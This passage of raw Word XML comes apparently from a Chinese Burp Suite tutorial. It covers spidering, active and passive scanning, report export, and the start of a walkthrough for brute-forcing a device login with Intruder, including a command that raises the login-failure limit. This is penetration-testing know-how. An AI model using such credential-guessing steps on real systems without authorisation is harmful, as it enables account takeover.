        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED97119" wp14:editId="66D49223">
            <wp:extent cx="5238750" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82" name="图片 82" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\2@9(`@4)2Q))}~79%[]1]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ocuments\Tencent Files\2227891138\Image\C2C\2@9(`@4)2Q))}~79%[]1]MK.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId157" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5238750" cy="321945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运行过程中，切换到spider选项，可以看到并控制程序的运行状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03F7428D" wp14:editId="3FC0DC09">
            <wp:extent cx="5267325" cy="3924300"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="84" name="图片 84" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\5}Y3}6]06MVMT%7(R1@2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ocuments\Tencent Files\2227891138\Image\C2C\5}Y3}6]06MVMT%7(R1@2Z%N.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId158" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="39243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再切换至target选项就可以看到爬取的结果，并可以通过右键菜单操作哪些内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Toc499884692"/>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scanner功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Scanner 是一款自动发现 web漏洞的工具，可以执行两种扫描类型：active scanning和passive scanning。默认情况下以被动扫描运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active scanning 扫描器向应用程序发送大量的伪造请求，这些请求都是有一个基础请求衍生出来的，然后通过分析响应结果来查找漏洞特征。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Passive scanning 扫描器不发送他自己的任何新请求，只分析现有的请求和响应的内容，从这些信息中推断出漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>canner使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在sitemap或者http history中，右击选中的URL，可以选择do an active scan或者do a passive scan.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C623AD" wp14:editId="20539EF5">
            <wp:extent cx="5248275" cy="4191000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="93" name="图片 93" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\[GQL@XCLE7TTAU83B`]7Z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ocuments\Tencent Files\2227891138\Image\C2C\[GQL@XCLE7TTAU83B`]7ZGV.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId159" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5248275" cy="41910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color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>切换到scanner页面，可以看到并控制扫描的运行情况。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4305E130" wp14:editId="539CD384">
            <wp:extent cx="5295900" cy="5676900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95" name="图片 95" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\_(0`NL]HRTD1BXL$M6JI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ocuments\Tencent Files\2227891138\Image\C2C\_(0`NL]HRTD1BXL$M6JI7_K.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5295900" cy="56769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color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在scan queue页面，可以看到扫描进度，或者控制扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426B4A11" wp14:editId="29054339">
            <wp:extent cx="5324475" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="19" name="图片 97" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\YB2`J`[UU2R8ZE0Y{HY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Documents\Tencent Files\2227891138\Image\C2C\YB2`J`[UU2R8ZE0Y{HYAE@1.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId161" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5324475" cy="18288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color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在living scan页面，可以设置是否进行自动扫描或者被动扫描。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F09B67" wp14:editId="2E869303">
            <wp:extent cx="3390900" cy="4276725"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="图片 99" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\3}MW$YYD$X4L6W_}$FX@S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Documents\Tencent Files\2227891138\Image\C2C\3}MW$YYD$X4L6W_}$FX@SMN.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId162" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3390900" cy="4276725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 报告导出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>右击选中的漏洞，选择report issue，导出报告。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC2B6B3" wp14:editId="77E7DE58">
            <wp:extent cx="5124450" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="图片 36" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\YYX@5EV]`}07WHMB4H~9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Documents\Tencent Files\2227891138\Image\C2C\YYX@5EV]`}07WHMB4H~9I[D.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5124450" cy="33528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color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以选择html或者xml格式，</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1549D6C6" wp14:editId="4CC126B2">
            <wp:extent cx="3295650" cy="1552575"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 37" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\EV2AB%G5HE4B(SR)43Q[9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Documents\Tencent Files\2227891138\Image\C2C\EV2AB%G5HE4B(SR)43Q[9SV.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3295650" cy="1552575"/>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rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一路next，然后选择保存地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F6606B" wp14:editId="0EDDB5FA">
            <wp:extent cx="4724400" cy="3467100"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="图片 38" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\52@PA69E6)S}[)1LDVQ)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Documents\Tencent Files\2227891138\Image\C2C\52@PA69E6)S}[)1LDVQ)G(3.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4724400" cy="34671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color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>报告内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9AE7C6" wp14:editId="53BA7A5C">
            <wp:extent cx="5219700" cy="4400550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="图片 39" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\A%Q@)OBUWYBKDUQC9{4S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Documents\Tencent Files\2227891138\Image\C2C\A%Q@)OBUWYBKDUQC9{4S_AW.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5219700" cy="4400550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="17" w:name="_Toc499884693"/>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Intruder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Intruser 是一个对 web 进行自动化的自定义攻击的工具，可用于暴力破解、SQL注入、模糊测试等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结合具体例子来看一下字典攻击破解设备用户名、密码的过程。(需要将设备登录设备次数调大一点，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SG-6000(M)(config)# admin max-login-failure 256</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.设置代理，登录设备UI，将提交用户名、密码的post请求发送到intruder（用户名和密码随意）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.进入intruder页面，在target页签下可以看到要攻击的目标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F4F6B0" wp14:editId="57A87A8E">
            <wp:extent cx="2933700" cy="1628775"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="153" name="图片 153" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\UF$~]D(]YUGS41T]6{{$$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Documents\Tencent Files\2227891138\Image\C2C\UF$~]D(]YUGS41T]6{{$$DN.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2933700" cy="1628775"/>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rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.在position页签下可以看到之前发送给intruder的请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntruder对进行猜解的参数进行了高亮显示，在猜解用户名和密码的过程中，要求用户名和密码作为参数不断改变，于是需要对应的配置Burp。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75727166" wp14:editId="427551C3">
            <wp:extent cx="5333141" cy="2666365"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="155" name="图片 155" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\5I90~5~@){T`K_$O[%~4B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Documents\Tencent Files\2227891138\Image\C2C\5I90~5~@){T`K_$O[%~4BIQ.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5368915" cy="2684251"/>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4.单击右边的clear按钮删除所有待猜解参数。burp在这次攻击中只需把用户名和密码作为参数，选中用户名，然后单击add按钮添加，同样将password也添加进去。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29CE7B7C" wp14:editId="71640F1F">
            <wp:extent cx="5408295" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="40" name="图片 3" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\C%N](PDH1S2CK$A0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227891138\Image\C2C\C%N](PDH1S2CK$A0X}@6[{6.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5435797" cy="1570044"/>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5.选择攻击类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>先看一下sniper、battering ram、pitchfork、cluster bomb的区别。</w:t>
      </w:r>
    </w:p>
